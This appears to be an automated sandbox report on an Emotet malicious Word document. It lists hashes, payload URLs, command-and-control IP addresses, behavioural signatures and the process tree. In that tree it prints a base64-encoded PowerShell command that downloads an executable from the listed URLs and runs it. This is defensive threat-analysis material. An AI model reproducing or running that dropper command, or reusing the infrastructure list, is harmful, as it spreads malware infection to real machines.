Analysis
-
max time kernel
142s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
13-09-2020 06:31
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e1_2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8_2020-09-13__063002._doc.doc
Resource
win7v200722
General
-
Target
emotet_e1_2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8_2020-09-13__063002._doc.doc
-
Size
169KB
-
MD5
9bcd7831593b18eb2fc20abb950776e0
-
SHA1
94fce0e45271cd1dc5ff594f886146c88b5bdf75
-
SHA256
2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8
-
SHA512
ce5e923278b315e334274b0b1f9434aaa2851135fb0fb4f147b8e123da1f595e50a70fc47079f8f3c8c5c6a43f9b5b04a5dbf799f29491bb73d716304892dfdc
Malware Config
Extracted
http://sampling-group.com/J0Eubtq06/
http://www.weddingsday.co.uk/docs/1oYncTNHDu/
http://sasystemsuk.com/recruit/sl979/
http://wellparts.net/cgi-bin/qAj081/
http://volkanakbalik.com/_inc/2W/
Extracted
emotet
82.76.111.249:443
116.125.120.88:443
217.160.182.191:8080
189.1.185.98:8080
189.194.58.119:80
213.181.91.224:80
219.92.13.25:80
190.6.193.152:8080
61.92.159.208:8080
209.236.123.42:8080
12.162.84.2:8080
190.147.137.153:443
104.131.103.37:8080
212.231.60.98:80
202.62.39.111:80
82.240.207.95:443
170.81.48.2:80
177.74.228.34:80
82.196.15.205:8080
114.109.179.60:80
70.32.115.157:8080
178.79.163.131:8080
104.131.41.185:8080
190.17.195.202:80
145.236.8.174:80
143.0.87.101:80
71.50.31.38:80
72.47.248.48:7080
201.213.156.176:80
192.241.143.52:8080
89.32.150.160:8080
177.66.190.130:80
137.74.106.111:7080
181.36.42.205:443
149.62.173.247:8080
186.70.127.199:8090
190.163.31.26:80
104.236.161.64:8080
77.55.211.77:8080
5.196.35.138:7080
190.181.235.46:80
45.161.242.102:80
172.104.169.32:8080
94.176.234.118:443
87.106.46.107:8080
111.67.12.221:8080
77.90.136.129:8080
80.249.176.206:80
186.103.141.250:443
73.116.193.136:80
177.144.135.2:80
51.255.165.160:8080
68.183.170.114:8080
217.199.160.224:7080
190.190.148.27:8080
2.47.112.152:80
192.241.146.84:8080
70.32.84.74:8080
181.120.79.227:80
177.72.13.80:80
204.225.249.100:7080
191.182.6.118:80
191.99.160.58:80
93.151.186.85:80
217.13.106.14:8080
186.250.52.226:8080
177.73.0.98:443
185.94.252.12:80
91.219.169.180:80
50.28.51.143:8080
189.2.177.210:443
68.183.190.199:8080
187.162.248.237:80
46.28.111.142:7080
212.71.237.140:8080
83.169.21.32:7080
181.129.96.162:8080
185.94.252.27:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1492 3116 powersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/2192-14-0x0000000000540000-0x000000000054C000-memory.dmp emotet behavioral2/memory/2192-14-0x0000000000540000-0x000000000054C000-memory.dmp emotet behavioral2/memory/3904-18-0x0000000000500000-0x000000000050C000-memory.dmp emotet behavioral2/memory/3904-18-0x0000000000500000-0x000000000050C000-memory.dmp emotet -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 20 1492 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
848.exemos.exepid process 2192 848.exe 3904 mos.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\International\Geo\Nation WINWORD.EXE -
Drops file in System32 directory 1 IoCs
Processes:
848.exedescription ioc process File opened for modification C:\Windows\SysWOW64\LocationFrameworkInternalPS\mos.exe 848.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 728 WINWORD.EXE 728 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powersheLL.exemos.exepid process 1492 powersheLL.exe 1492 powersheLL.exe 1492 powersheLL.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe 3904 mos.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1492 powersheLL.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXE848.exemos.exepid process 728 WINWORD.EXE 728 WINWORD.EXE 728 WINWORD.EXE 728 WINWORD.EXE 728 WINWORD.EXE 728 WINWORD.EXE 728 WINWORD.EXE 728 WINWORD.EXE 728 WINWORD.EXE 2192 848.exe 3904 mos.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
848.exedescription pid process target process PID 2192 wrote to memory of 3904 2192 848.exe mos.exe PID 2192 wrote to memory of 3904 2192 848.exe mos.exe PID 2192 wrote to memory of 3904 2192 848.exe mos.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8_2020-09-13__063002._doc.doc" /o ""1⤵
- Checks computer location settings
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABHAEQAWgBBAFoAeABwAGgAPQAnAFAATABKAFMAUQBtAGIAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAHUAUgBpAHQAWQBQAGAAUgBvAHQAbwBjAGAATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATgBXAEIATABGAHoAcgBnACAAPQAgACcAOAA0ADgAJwA7ACQAWgBFAEgARwBMAHQAbAB3AD0AJwBSAEsAWQBBAEkAeAB5AHcAJwA7ACQAWgBVAEMASwBYAGQAaQBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAFcAQgBMAEYAegByAGcAKwAnAC4AZQB4AGUAJwA7ACQAWgBWAEYAVQBRAHoAdAB1AD0AJwBWAEYATwBKAEsAZABhAGcAJwA7ACQARABZAFQAVgBNAHMAdQBxAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABKAEMASwBQAFEAegB6AHMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AcABsAGkAbgBnAC0AZwByAG8AdQBwAC4AYwBvAG0ALwBKADAARQB1AGIAdABxADAANgAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHcAZQBkAGQAaQBuAGcAcwBkAGEAeQAuAGMAbwAuAHUAawAvAGQAbwBjAHMALwAxAG8AWQBuAGMAVABOAEgARAB1AC8AKgBoAHQAdABwADoALwAvAHMAYQBzAHkAcwB0AGUAbQBzAHUAawAuAGMAbwBtAC8AcgBlAGMAcgB1AGkAdAAvAHMAbAA5ADcAOQAvACoAaAB0AHQAcAA6AC8ALwB3AGUAbABsAHAAYQByAHQAcwAuAG4AZQB0AC8AYwBnAGkALQBiAGkAbgAvAHEAQQBqADAAOAAxAC8AKgBoAHQAdABwADoALwAvAHYAbwBsAGsAYQBuAGEAawBiAGEAbABpAGsALgBjAG8AbQAvAF8AaQBuAGMALwAyAFcALwAnAC4AIgBzAHAAYABMAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFkAVwBPAEgATgBiAHYAcAA9ACcAUgBLAEIAVQBTAHEAagB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABDAFAAWABSAE8AYQBlAHoAIABpAG4AIAAkAEoAQwBLAFAAUQB6AHoAcwApAHsAdAByAHkAewAkAEQAWQBUAFYATQBzAHUAcQAuACIAZABPAGAAdwBOAEwATwBhAGAAZABGAEkATABFACIAKAAkAEMAUABYAFIATwBhAGUAegAsACAAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQATABFAE8ASQBOAHEAdgBxAD0AJwBGAEgAWgBWAFoAYgBhAHoAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABaAFUAQwBLAFgAZABpAGYAKQAuACIAbABFAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADkAOQA1ADYAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAYABBAHQARQAiACgAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQAUwBIAEQAWQBBAGYAYgBqAD0AJwBBAE4AWABaAE8AYwBvAGIAJwA7AGIAcgBlAGEAawA7ACQAUQBJAFgATABYAGsAcQBoAD0AJwBXAEwAWgBVAFMAcQBnAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBHAE8AQwBNAGgAegBwAD0AJwBIAEkATABTAEwAegBxAGoAJwA=1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\848.exeC:\Users\Admin\848.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\LocationFrameworkInternalPS\mos.exe"C:\Windows\SysWOW64\LocationFrameworkInternalPS\mos.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\848.exe
-
C:\Users\Admin\848.exe
-
C:\Windows\SysWOW64\LocationFrameworkInternalPS\mos.exe
-
memory/728-0-0x00007FFFF7060000-0x00007FFFF7726000-memory.dmpFilesize
6.8MB
-
memory/1492-8-0x00007FFFEF710000-0x00007FFFF00FC000-memory.dmpFilesize
9.9MB
-
memory/1492-9-0x000001E3602E0000-0x000001E3602E1000-memory.dmpFilesize
4KB
-
memory/1492-10-0x000001E360490000-0x000001E360491000-memory.dmpFilesize
4KB
-
memory/2192-13-0x0000000000601000-0x0000000000604000-memory.dmpFilesize
12KB
-
memory/2192-14-0x0000000000540000-0x000000000054C000-memory.dmpFilesize
48KB
-
memory/3904-15-0x0000000000000000-mapping.dmp
-
memory/3904-17-0x0000000000650000-0x0000000000651000-memory.dmpFilesize
4KB
-
memory/3904-18-0x0000000000500000-0x000000000050C000-memory.dmpFilesize
48KB